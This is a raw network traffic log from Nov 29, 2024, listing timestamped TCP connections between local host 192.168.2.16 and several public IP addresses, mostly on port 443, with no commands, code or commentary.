                                                        Nov 29, 2024 14:30:00.317043066 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:00.317094088 CET49719443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:00.317178965 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:00.317193031 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:00.317282915 CET49719443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:00.317298889 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:00.383799076 CET4968080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:30:00.469907045 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.470020056 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.470153093 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.470710039 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.470726013 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.609119892 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:00.609203100 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:00.612706900 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:00.612714052 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:00.612967968 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:00.655797958 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:00.678468943 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:00.719336033 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:00.989798069 CET4968080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:30:01.308254004 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.308279037 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.308286905 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.308298111 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.308327913 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.308336973 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:01.308351040 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.308389902 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:01.308413029 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:01.328237057 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.328310013 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:01.328315973 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.328375101 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:01.328512907 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:01.328512907 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:30:01.328522921 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.328531027 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:01.732575893 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:01.732624054 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:01.732841015 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:01.733047009 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:01.733103991 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:01.733165979 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:01.733237982 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:01.733252048 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:01.733391047 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:01.733408928 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:01.844388962 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.844721079 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.844754934 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.845864058 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.845926046 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.852905035 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.853213072 CET49719443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.853243113 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.854360104 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.854449034 CET49719443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.869988918 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.870100021 CET49719443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.870112896 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.870213985 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.870276928 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.870292902 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.911801100 CET49719443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.911801100 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:01.911813021 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:01.958781958 CET49719443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:02.186559916 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:02.186644077 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:02.186712027 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:02.188100100 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:02.188121080 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:02.198822975 CET4968080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:30:03.590363979 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.590645075 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.590661049 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.591571093 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.591639996 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.592660904 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.592713118 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.592828035 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.602159023 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.602401018 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.602421045 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.603466988 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.603528976 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.603797913 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.603856087 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.639328957 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.645781994 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.645790100 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.645798922 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.645812988 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:03.693785906 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:03.693833113 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.547130108 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.547254086 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.547324896 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.547328949 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.547377110 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.548077106 CET49722443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.548090935 CET44349722103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.560753107 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.564785957 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.564826965 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.564996004 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.565026999 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.565063000 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.565129995 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.565386057 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.565402031 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.565642118 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:04.565653086 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.601809025 CET4968080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:30:04.607331038 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:04.950797081 CET49678443192.168.2.1620.189.173.10
                                                        Nov 29, 2024 14:30:05.177886963 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:05.178047895 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:05.178107977 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:05.178126097 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:05.178138018 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:05.178175926 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:05.179205894 CET49721443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:05.179218054 CET44349721103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.022001028 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:30:06.022073984 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:30:06.022222042 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:30:06.145783901 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:30:06.145802975 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:30:06.364407063 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.365026951 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:06.365050077 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.365403891 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.365745068 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:06.365812063 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.365895033 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:06.382858038 CET49673443192.168.2.16204.79.197.203
                                                        Nov 29, 2024 14:30:06.411335945 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.413583994 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.414132118 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:06.414149046 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.414530039 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.415061951 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:06.415061951 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:06.415169954 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:06.461811066 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.307984114 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.351696014 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.351716995 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.371892929 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.380090952 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.380104065 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.380141020 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.380167007 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.380176067 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.380196095 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.380214930 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.380239010 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.383215904 CET49724443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.383229971 CET44349724103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.398121119 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.542572021 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.542594910 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.542661905 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.542876005 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.542887926 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.545934916 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:07.545960903 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:07.546024084 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:07.546195030 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:07.546209097 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:07.605355024 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.605366945 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.605391026 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.605398893 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.605422020 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.605427980 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.605444908 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.605458975 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.605479956 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.621078968 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.621143103 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.621151924 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.621162891 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.621186972 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.621215105 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.621373892 CET49725443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.621383905 CET44349725103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.624913931 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.624927044 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.624978065 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.625376940 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.625389099 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.625684023 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.625699043 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:07.625968933 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.626177073 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:07.626189947 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:08.840889931 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:08.841180086 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:08.841198921 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:08.842050076 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:08.842117071 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:08.843105078 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:08.843158007 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:08.843283892 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:08.843290091 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:08.894813061 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:09.295382977 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:09.295455933 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:09.295521021 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:09.296458960 CET49728443192.168.2.16104.26.12.205
                                                        Nov 29, 2024 14:30:09.296472073 CET44349728104.26.12.205192.168.2.16
                                                        Nov 29, 2024 14:30:09.404167891 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.404470921 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.404483080 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.404798031 CET4968080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:30:09.405514956 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.405584097 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.405870914 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.405934095 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.406003952 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.406011105 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.449388981 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:09.449407101 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:09.449486017 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:09.449683905 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:09.449695110 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:09.453774929 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.488984108 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.489236116 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.489260912 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.490156889 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.490226984 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.490490913 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.490541935 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.490607977 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.490613937 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.530798912 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.549124956 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.549329042 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.549339056 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.549691916 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.549963951 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.550023079 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.550064087 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.591330051 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:09.593780041 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:09.843585968 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:09.843611956 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:09.843693972 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:09.843895912 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:09.843909025 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:10.359791994 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.368165016 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.368175983 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.368211031 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.368230104 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.368240118 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.368297100 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.368706942 CET49726443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.368716002 CET44349726103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.444859028 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.485797882 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.485817909 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.509068966 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.509233952 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.509282112 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.509586096 CET49729443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.509593010 CET44349729103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.533778906 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.658687115 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:10.658976078 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:10.658988953 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:10.659854889 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:10.659945011 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:10.660197020 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:10.660293102 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:10.660377026 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:10.660382032 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:10.708847046 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:10.747615099 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.747626066 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.747667074 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.747685909 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.747695923 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.747718096 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.747746944 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.747773886 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.763189077 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.763226986 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.763243914 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:10.763297081 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.763324022 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.763540030 CET49730443192.168.2.16103.160.107.138
                                                        Nov 29, 2024 14:30:10.763552904 CET44349730103.160.107.138192.168.2.16
                                                        Nov 29, 2024 14:30:11.119996071 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:11.120064974 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:11.120127916 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:11.120789051 CET49731443192.168.2.16172.67.74.152
                                                        Nov 29, 2024 14:30:11.120805025 CET44349731172.67.74.152192.168.2.16
                                                        Nov 29, 2024 14:30:12.112602949 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.112943888 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.112970114 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.114016056 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.114116907 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.118500948 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.118578911 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.118674994 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.118684053 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.159913063 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.672676086 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.672755003 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.672806978 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.673330069 CET49732443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.673341990 CET44349732103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.817126036 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.817167044 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:12.817249060 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.817446947 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:12.817460060 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:14.555795908 CET49678443192.168.2.1620.189.173.10
                                                        Nov 29, 2024 14:30:14.564594030 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:14.566040039 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:14.566063881 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:14.567086935 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:14.567154884 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:14.568130970 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:14.568205118 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:14.569880009 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:14.569890022 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:14.619338036 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:15.386923075 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:15.387020111 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:15.387063980 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:15.387926102 CET49733443192.168.2.16103.126.138.87
                                                        Nov 29, 2024 14:30:15.387939930 CET44349733103.126.138.87192.168.2.16
                                                        Nov 29, 2024 14:30:19.006912947 CET4968080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:30:20.852749109 CET4434971923.195.76.153192.168.2.16
